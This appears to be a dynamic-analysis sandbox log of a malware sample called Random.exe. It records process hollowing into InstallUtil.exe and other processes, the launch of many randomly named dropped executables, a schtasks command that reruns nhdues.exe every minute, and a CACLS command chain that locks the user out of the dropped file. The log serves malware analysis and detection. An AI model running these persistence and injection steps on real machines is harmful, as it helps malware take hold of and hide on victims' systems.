CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 2064 thread_handle: 0x00000000000000e4 process_identifier: 2060 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000000000000e8	1	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000000e8	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000000000000e4 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x0000022c suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000354 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x000005d4 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x000005fc suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000620 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x0000064c suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000678 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x000006a4 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x000006d0 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x000006fc suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000728 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x0000074c suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000778 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000378 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x000005d8 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x000005dc suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x0000088c suspend_count: 1 process_identifier: 2060	1	0
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 2308 thread_handle: 0x00000928 process_identifier: 2304 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe track: 1 command_line: "C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe" filepath_r: C:\Users\test22\Pictures\NsAOOuuxBVI141vT8Ty9RGNr.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000092c	1	1
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 2300 thread_handle: 0x00000910 process_identifier: 2296 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe track: 1 command_line: "C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe" filepath_r: C:\Users\test22\Pictures\XHChe4TMuyQgPR4OrdooBhRa.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000091c	1	1
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x000008d8 suspend_count: 1 process_identifier: 2060	1	0
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 2460 thread_handle: 0x000008bc process_identifier: 2456 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe track: 1 command_line: "C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe" filepath_r: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000008dc	1	1
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x0000020c suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x000008d8 suspend_count: 1 process_identifier: 2060	1	0
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x0000071c suspend_count: 1 process_identifier: 2060	1	0
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 2644 thread_handle: 0x000006dc process_identifier: 2640 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe track: 1 command_line: "C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe" filepath_r: C:\Users\test22\Pictures\jsj9BnxQe1wUSt4fq4fFdIbl.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000728	1	1
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 2700 thread_handle: 0x00000718 process_identifier: 2696 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe track: 1 command_line: "C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe" filepath_r: C:\Users\test22\Pictures\2v4fymhYYNWC2FFg5XXDybVC.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000694	1	1
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x000006c0 suspend_count: 1 process_identifier: 2060	1	0
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 2892 thread_handle: 0x00000634 process_identifier: 2888 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe track: 1 command_line: "C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe" filepath_r: C:\Users\test22\Pictures\vtmaPKRXAfqpNkKfnPwslgoN.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000638	1	1
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000654 suspend_count: 1 process_identifier: 2060	1	0
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 3020 thread_handle: 0x00000698 process_identifier: 3016 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe track: 1 command_line: "C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe" filepath_r: C:\Users\test22\Pictures\DhJlbLqN6jQFakonmgEZ33Ks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000884	1	1
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x0000088c suspend_count: 1 process_identifier: 2060	1	0
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 508 thread_handle: 0x0000077c process_identifier: 2164 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe track: 1 command_line: "C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe" --silent --allusers=0 filepath_r: C:\Users\test22\Pictures\tLqJinIq9eTQIYLlq5LobLYm.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000780	1	1
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 2440 thread_handle: 0x000000000000000c process_identifier: 2436 current_directory: filepath: track: 1 command_line: cmd /c hime.bat filepath_r: stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000000000000078	1	1
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 2416 thread_handle: 0x0000000000000078 process_identifier: 2372 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\himeffectively.exe filepath_r: stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x000000000000000c	1	1
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 2404 thread_handle: 0x00000274 process_identifier: 2400 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000027c	1	1
NtResumeThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 2400	1	0
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 2580 thread_handle: 0x00000264 process_identifier: 2576 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000026c	1	1
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 2740 thread_handle: 0x000001ec process_identifier: 2736 current_directory: C:\Users\test22\AppData\Local\Temp\1ff8bec27e filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000258	1	1
CreateProcessInternalW Oct. 19, 2023, 7:47 a.m.	thread_identifier: 3064 thread_handle: 0x00000098 process_identifier: 3060 current_directory: filepath: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe track: 1 command_line: "C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe" filepath_r: C:\Users\test22\Pictures\1Dn33rKCA4dC8aXmng0BVypp.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000009c	1	1
NtGetContextThread Oct. 19, 2023, 7:47 a.m.	thread_handle: 0x00000098	1	0
NtUnmapViewOfSection Oct. 19, 2023, 7:47 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 3060 process_handle: 0x0000009c	1	0
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 3060 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000009c	1	0

Random.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All